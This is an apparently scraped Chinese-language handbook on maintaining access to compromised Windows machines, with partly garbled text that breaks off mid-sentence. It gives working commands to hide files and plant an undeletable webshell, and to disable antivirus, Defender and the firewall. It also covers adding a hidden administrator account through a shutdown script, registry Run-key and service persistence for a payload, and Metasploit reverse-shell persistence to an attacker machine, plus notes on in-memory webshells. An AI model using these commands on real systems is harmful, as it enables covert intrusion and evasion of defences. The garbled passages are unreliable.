2024Windows權限維持手冊

Windows權限維持標，而不會失去指揮和控制服務器的通信。隱藏的技巧 “真正”隱藏文件 使用attrib+s+a+h+r命令就是把原本的文件夾增加了系統(tǒng)文件屬性、存檔文件屬性、只讀文件屬性和隱藏文件屬性。Attrib+s+a+h+rAttrib+s+a+h+r測試如下：在當前目錄輸入命令Attrib+s+a+h+rtestAttrib+s+a+h+rtesttest接下來仍然可以使用Attrib-s-a-h-rtestAttrib-s-a-h-rtest恢復該文件的正常屬性。就又回來了系統(tǒng)文件夾圖標 建一個文件夾，假設叫“我的電腦”然后把要存放的文件放在里面3.給文件夾重新命名為“我的電腦.{20D04FE0-3AEA-1069-A2D8-08002B30309D}”測試如下：在test文件夾里新建一個test.txt，將test文件夾重命名為“我的電腦.{20D04FE0-3AEA-1069-A2D8-08002B30309D}”。表等還無法刪除，或者重命名后面的字段（圖形化界面中）。但是此方法在cmd里面使用dir可以查看到，也能通過cd下面是代號:我的電腦我的電腦.{20D04FE0-3AEA-1069-A2D8-08002B30309D}回收站.{645ff040-5081-101b-9f08-00aa002f954e}拔號?絡.{992CFFA0-F557-101A-88EC-00DD010CCC48}打印機.{2227a280-3aea-1069-a2de-08002b30309d}控制?板.{21ec2020-3aea-1069-a2dd-08002b30309d}?上鄰居.{208D2C60-3AEA-1069-A2D7-08002B30309D}畸形目錄 只需要在目錄名后面加兩個點或者多個點。用戶圖形界面無法訪問。創(chuàng)建目錄：創(chuàng)建目錄：mdtest...\版本而定。//在目錄中顯示為test...，也有可能會顯示為test..，隨系統(tǒng)復制文件：copytest.txta...\test.txt刪除目錄：rd/s/qtest...\在win11中，該目錄點擊后沒有反應在注冊表中，也不能使用cd命令進入那么我們該怎么訪問里面的文件呢，答案是通過瀏覽器來訪問。在本地開一個http器，可以直接訪問到里面的文件。除的webshell windows系統(tǒng)中，不能使用某些系統(tǒng)保留名來創(chuàng)建文件\文件夾，包括aux,com1,com2,prn,con和nul等，但是這些是可以通過cmd來創(chuàng)建的，并且使用copy命令就可以實現。F:\kcon>copytest.txtF:\kcon>copytest.txt已復制 1個文件。F:\kcon>dir驅動器F中的卷是F卷的序列號是426C-9176F:\kcon的目錄02/15/202211:00AM<DIR>.02/15/202210:55AM7aux.asp11/05/202107:16PM8,045,026Containerescapein2021.pdf11/05/202107:16PM4,313,885FairplayPlayDRM.pdf02/15/202210:5502/15/202210:55AM11/05/202107:16PM5個文件7test.txt8,210,308高級攻防演練下的Webshell.pdf20,569,233字節(jié)1個目錄56,456,802,304可用字節(jié)F:\kcon>delaux.asp利用系統(tǒng)保留文件名創(chuàng)建無法刪除的webshell除，然而在IIS中，這種文件也可以解析。驅動級文件隱藏 驅動級文件隱藏可以通過一些軟件來實現，比如EasyFileLocker徑，你才可以讀取文件內容。關閉殺軟 拿到目標的shell后，我們做的第一件事情就是關閉目標主機的殺毒軟件，通過命令runkillavrunkillav//meterperter中使用netshadvfirewallsetallprofilesstateoff//netstopwindefend//關閉windowsdefender組策略 組策略后門比較起其他的后門更加隱蔽。往注冊表中添加相應的鍵值實現隨系統(tǒng)啟動而運行的木馬就是一個木馬運行的常用例子。其實組策略也可以實現該功能，而且它還可以在系統(tǒng)關機的時候進行某種操作。這就是通過組策略的”腳本（啟動/關機）“項目來實現的。具體的位置在”計算機配置->windows“項下。測試如下：在虛擬機里面新建一個txt，輸入以下內容echooffechooffnetuserhack$test168/addnetlocalgroupadministratorshack$exit重命名為add.bat，接著在win+rgpedit.msc，定位到”計算機配置->windows設置->本(啟動/關機）“，雙擊右邊窗口的關機，在其中添加add.bat。就是說當系統(tǒng)關機時創(chuàng)建hack$用戶。當他們獲取了管理員的密碼后，就可以直接利用管理員賬戶遠程登陸系統(tǒng)。注冊表 在windows性技術需要創(chuàng)建注冊表，而各種滲透工具都提供了這種能力。注冊表項可以從終端添加到運行鍵以實現持久性。這些鍵將包含用戶登錄時將執(zhí)行的實際負載的引用注冊表項可以從終端添加到運行鍵以實現持久性。這些鍵將包含用戶登錄時將執(zhí)行的實際負載的引用命令行中我們可以輸入以下命令來添加注冊表regregadd"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"Pentestlab/tREG_SZ/d"C:\Users\pte1\Donwloads\pentestlab.exe"regadd"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce"Pentestlab/tREG_SZ/d"C:\Users\pte1\Donwloads\pentestlab.exe"regadd"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices"/vPentestlab/tREG_SZ/d"C:\Users\pte1\Donwloads\pentestlab.exe"regadd"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"/vPentestlab/tREG_SZ/d"C:\Users\pte1\Donwloads\pentestlab.exe"以上是添加當前用戶的Run鍵。如果已經獲得system權限的shell執(zhí)行。regregadd"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run"Pentestlab/tREG_SZ/d"C:\tmp\pentestlab.exe"regadd"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce"/vPentestlab/tREG_SZ/d"C:\tmp\pentestlab.exe"regadd"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices"/vPentestlab/tREG_SZ/d"C:\tmp\pentestlab.exe"regadd"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"/vPentestlab/tREG_SZ/d"C:\tmp\pentestlab.exeps：Run中的程序是在每次系統(tǒng)啟動時被啟動，RunServices則是會在每次登錄系統(tǒng)時被啟動。測試環(huán)境： kali:33win7(受害機)：40中轉機:將shell.exe和pentestlab.exe下載進受害機器。并且連接shell。因為好輸入的關系，就直接在受害機器的cmd上輸入了命令重啟受害機（以當前用戶），發(fā)現會自動回連kali監(jiān)聽終端。另外還有兩個注冊表位置，這些位置允許攻擊者通過執(zhí)行任意有效負載或者DLL在登陸期間執(zhí)行，并且需要管理員級別的權限。regaddregadd"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001"/vPentestlab/tREG_SZ/d"C:\tmp\pentestlab.exe"regadd"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend"/vPentestlab/tREG_SZ/d"C:\tmp\pentestlab.dll"（ps:這個最特別的差別是它可以實現dll限。）Metasploit metasploit框架通過使用Meterpreter腳本和后期利用模塊通過注冊表支持持久性。Meterpreter腳本將以vbs項將在用戶登錄期間運行有效負載。測試環(huán)境： kali:33win7(受害機)：40中轉機:仍然先連接shell。runrunpersistence-U-Pwindows/meterpreter/reverse_tcp-i5-p444433 #i反向連接的時間間隔-p指定端口-r遠程ip接下來重啟受害機等待自動重連。其實在注冊表里面也是能夠看到該注冊項目的計劃任務 windows操作系統(tǒng)提供了一個實用程序(schtasks.exe)或腳本。這種行為可作為一種持久性機制被惡意利用。通過計劃任務執(zhí)行持久性不需要管理員權限。但如果已經獲得了管理員權限的話，則允許進一步操作，例如在用戶登錄期間或者在空閑狀態(tài)期間來執(zhí)行任務。計劃任務的持久化技術既可以手動實現，也可以自動實現。有效負載可以從磁盤或者遠程位置執(zhí)行，它們可以具有可執(zhí)行文件、Powershell但是仍然可以在持久化場景中使用。Metasploit的web_delivery模塊可用于托管和生成各種格式的有效負載。新服務 如果未正確配置Windows升，創(chuàng)建一個新的服務需要管理員級別的權限。命令行實現 如果賬戶具有本地管理員特權，則可以從命令提示符創(chuàng)建服務。參數binpath而參數"auto"用于確保惡意服務自動啟動scsccreatepentestlabbinpath="cmd.exe/kC:\Users\pte1\Downloads\pentestlab.exe"start="auto"obj="LocalSystem"scstartpentestlab測試環(huán)境： kali:33win7(受害機)：40中轉機:注意cmd需要在管理員權限下使用為了方便就直接在受害機器上創(chuàng)建服務引用之前的木馬。然后只需要啟動服務就可以自動連接上msf話了Metasploit Metasploit框架的后開發(fā)模塊，也支持兩種持久性技術。注冊表運行鍵新服務在新建的msf會話里面通過persistence_exe來增添新的服務。useusepost/windows/manage/persistence_exesetREXEPATH/tmp/pentestlab.exesetSESSION1setSTARTUPSERVICEsetLOCALEXEPATHC:\\tmprun測試環(huán)境： 在新建的msf會話里面輸入以下命令usepost/windows/manage/persistence_exeusepost/windows/manage/persistence_exe設置相應參數之后run（ps：該方法需要在提權后的shell后才能使用，否則會創(chuàng)建失?。﹥却骜R 內存?是??件攻擊的?種技術?段，那我們不得不先簡單介紹?下??件攻擊。??件攻擊可以有效地躲避傳統(tǒng)安全軟件的檢測，它們可以在系統(tǒng)的內存中遠程加載執(zhí)?、駐留在注冊表中或濫?常?的?名單?具，例如PowerShell，WindowsManagementInstrumentation（WMI）和PsExec攻擊技術允許攻擊者訪問系統(tǒng)，從?啟?后續(xù)的惡意活動。通過操縱漏洞利?程序、合法?具、宏和腳本，攻擊者可以破壞系統(tǒng)、提升特權或在?絡上橫向傳播惡意代碼。?且，??件威脅在執(zhí)?后不會留下任何痕跡，這使其難以被檢測和清除。內存?是??件攻擊的?種常??段，隨著攻防演練熱度越來越?：攻防雙?的博弈，流量分析、等專業(yè)安全設備被藍??泛使?，傳統(tǒng)的?件上傳的webshll或以?件形式駐留的后?越來越容易被檢Webshell內存?，是在內存中寫?惡意后?和??并執(zhí)?，達到遠程控制Web服務器的?類內存?，其瞄準了企業(yè)的對外窗?：?站、應?。但傳統(tǒng)的Webshell或?站漏洞植???，區(qū)別在于Webshell內存?是??件?，利?中間件的進程執(zhí)?某些惡意代碼，不會有?件落地，給檢測帶來巨?難度。內存?類型根據內存?注?的?式，?致可以將內存?劃分為如下兩類servlet-api型 通過命令執(zhí)?等?式動態(tài)注冊?個新的listener、filter或者servletspring的controller內存?，tomcat的valve內存?字節(jié)碼增強型通過java的instrumentation動態(tài)修改已有代碼，進?實現命令執(zhí)?等功能。什么是servletServletWebHTTPHTTP服務給?戶。請求的處理過程客戶端發(fā)起?個http請求，?如get類型。Servlet容器接收到請求，根據請求信息，封裝成HttpServletRequest和HttpServletResponse對象。Servlet容器調?HttpServlet的init()?法，init?法只在第?次請求的時候被調?。Servlet容器調?service()?法。service()?法根據請求類型，這?是get類型，分別調?doGet或者doPost?法，這?調?doGet?法。doXXX?法中是我們??寫的業(yè)務邏輯。業(yè)務邏輯處理完成之后，返回給Servlet容器關閉時候，會調?destory?法。servlet生命周期服務器啟動時(web.xml中配置load-on-startup=1，默認為0)或者第?次請求該servletServlet對象，也就是會執(zhí)?初始化?法init(ServletConfigconf)。servlet對象去處理所有客戶端請求，在service(ServletRequestreq，ServletResponseres)執(zhí)?服務器關閉時，銷毀這個servlet對象，執(zhí)?destroy()?法。由JVM進?垃圾回收。劫持后門msdtc.exe簡介msdtc.exeMicrosoftpersonalWebServer和MicrosoftSQLServer。該服務用于管理多個服務器。msdtc.exe源管理器。它對應的服務是MSDTC，全稱為DistributedTransactionCoordinator，是windows系統(tǒng)默認啟動的服務。對應的進程msdtc.exem,它位于windir/system32目錄下當windows